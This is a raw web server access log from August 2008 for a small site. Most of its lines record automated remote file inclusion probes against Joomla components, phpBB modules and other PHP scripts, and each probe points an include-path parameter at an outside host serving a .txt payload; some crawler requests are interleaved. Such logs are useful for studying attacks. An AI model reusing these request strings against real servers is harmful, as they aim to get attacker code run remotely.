217.75.193.70 - - [19/Aug/2008:12:07:51 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9966 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [19/Aug/2008:12:07:52 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.talksurrey.ca/net/ngibul/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [19/Aug/2008:12:07:52 -0700] "GET /phphtml.php?htmlclass_path=http://www.talksurrey.ca/net/ngibul/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [19/Aug/2008:12:07:52 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.talksurrey.ca/net/ngibul/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:07:52 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:07:52 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:07:52 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:07:54 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9966 "-" "libwww-perl/5.805" "www.dmulk.com"
195.218.170.130 - - [19/Aug/2008:12:07:54 -0700] "GET /logs/access_080408.log/phphtml.php?htmlclass_path=http://www.talksurrey.ca/net/ngibul/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:07:54 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9966 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:07:59 -0700] "GET /bikes/dteel/SeaSTOC07/ HTTP/1.0" 200 973 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:08:02 -0700] "GET /bikes/dteel/2008_08_17/ HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:08:02 -0700] "GET /bikes/dteel/2008_02_07/?D=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:08:03 -0700] "GET /bikes/dteel/2008_07_05/ HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.75.193.70 - - [19/Aug/2008:12:08:13 -0700] "GET /logs/access_080510.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:18 -0700] "GET /logs/access_080219.log/modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:19 -0700] "GET /modules/MDForum/includes/functions_admin.php?phpbb_root_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:23 -0700] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:32 -0700] "GET /logs/access_080429.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:12:08:32 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:12:08:32 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:12:08:33 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 200 9956 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:35 -0700] "GET /logs/access_080325.log//codebb/pass_code.php?phpbb_root_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:35 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:35 -0700] "GET //codebb/pass_code.php?phpbb_root_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:37 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:12:08:37 -0700] "GET /logs/access_080510.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:08:42 -0700] "GET /logs/access_080506.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
84.19.178.201 - - [19/Aug/2008:12:08:44 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [19/Aug/2008:12:08:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:08:58 -0700] "GET /bikes/dteel/2008_07_20/?N=D HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:09:00 -0700] "GET /logs/access_080804.log/index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:09:01 -0700] "GET /index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:09:02 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:09:02 -0700] "GET /logs/index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:09:04 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:09:10 -0700] "GET /logs/access_080704.log/index2.php?DoAction=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:12:09:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:12:09:19 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [19/Aug/2008:12:09:20 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.110.54.240 - - [19/Aug/2008:12:09:20 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:12:09:23 -0700] "GET /logs/access_080530.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.6 - - [19/Aug/2008:12:09:24 -0700] "GET /logs/access_080605.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:09:28 -0700] "GET /bikes/dteel/2008_07_20/?D=A HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:09:35 -0700] "GET /bikes/dteel/2008_01_26/?D=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:09:37 -0700] "GET /bikes/dteel/WeSTOC07/?D=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.10.136.249 - - [19/Aug/2008:12:09:46 -0700] "GET /logs/access_080524.log///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:12:09:46 -0700] "GET /logs/access_080725.log//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.10.136.249 - - [19/Aug/2008:12:09:46 -0700] "GET ///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [19/Aug/2008:12:09:46 -0700] "GET /logs///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:12:09:46 -0700] "GET //include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
81.29.112.219 - - [19/Aug/2008:12:09:47 -0700] "GET /logs//include/lib.inc.php?site_path=http://m4ng4.100webspace.net/id2.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
75.125.40.130 - - [19/Aug/2008:12:09:51 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.40.130 - - [19/Aug/2008:12:09:51 -0700] "GET /logs/access_080510.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.40.130 - - [19/Aug/2008:12:09:51 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.40.130 - - [19/Aug/2008:12:09:51 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 200 9956 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:12:09:52 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [19/Aug/2008:12:09:52 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.221.130.12 - - [19/Aug/2008:12:09:53 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:09:53 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:09:55 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 200 9927 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:09:55 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:04 -0700] "GET /bikes/dteel/2008_01_26/?S=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:12:10:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:06 -0700] "GET /bikes/dteel/2008_01_26/?M=A HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:10:08 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:10:10 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 200 9926 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:10:11 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:13 -0700] "GET /bikes/dteel/2008_07_05/?S=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:12:10:18 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:12:10:18 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:12:10:19 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.182.209 - - [19/Aug/2008:12:10:19 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:19 -0700] "GET /bikes/dteel/2008_02_15/?S=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:21 -0700] "GET /bikes/dteel/2008_07_05/?M=A HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:22 -0700] "GET /bikes/dteel/2008_07_20/?S=A HTTP/1.0" 200 2246 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:12:10:23 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.135.41.76 - - [19/Aug/2008:12:10:23 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:24 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:25 -0700] "GET /logs/access_080226.log//components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:26 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:26 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:12:10:27 -0700] "GET /logs/db.php?path_local=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:12:10:27 -0700] "GET /db.php?path_local=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.10.136.249 - - [19/Aug/2008:12:10:33 -0700] "GET ///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:34 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:10:35 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:10:46 -0700] "GET /logs/access_080510.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:52 -0700] "GET /bikes/dteel/2008_08_17/?N=D HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.93.62.114 - - [19/Aug/2008:12:10:53 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:10:56 -0700] "GET /bikes/CreSTOC07/?M=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:12:11:05 -0700] "GET /bikes/dteel/2008_07_05/?N=D HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:11:13 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [19/Aug/2008:12:11:13 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.206.113.104 - - [19/Aug/2008:12:11:45 -0700] "GET /logs/access_080718.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [19/Aug/2008:12:11:46 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.113.104 - - [19/Aug/2008:12:11:46 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:12:11:51 -0700] "GET /logs//modules/netcat/index.php?DOCUMENT_ROOT=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.88.11 - - [19/Aug/2008:12:11:51 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.88.11 - - [19/Aug/2008:12:11:51 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.88.11 - - [19/Aug/2008:12:11:52 -0700] "GET /logs/access_080510.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.88.11 - - [19/Aug/2008:12:11:52 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?%0D? HTTP/1.1" 200 9967 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:12:11:54 -0700] "GET //admin/images.php?error=DOCUMENT_ROOThttp://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:12:11:54 -0700] "GET /logs//admin/images.php?error=DOCUMENT_ROOThttp://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:12:11:54 -0700] "GET /logs/access_080806.log//admin/images.php?error=DOCUMENT_ROOThttp://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:11:56 -0700] "GET /logs/access_080321.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:11:56 -0700] "GET /logs/access_080321.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [19/Aug/2008:12:11:56 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://ask-a2.ru/arhiv/gallery2/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
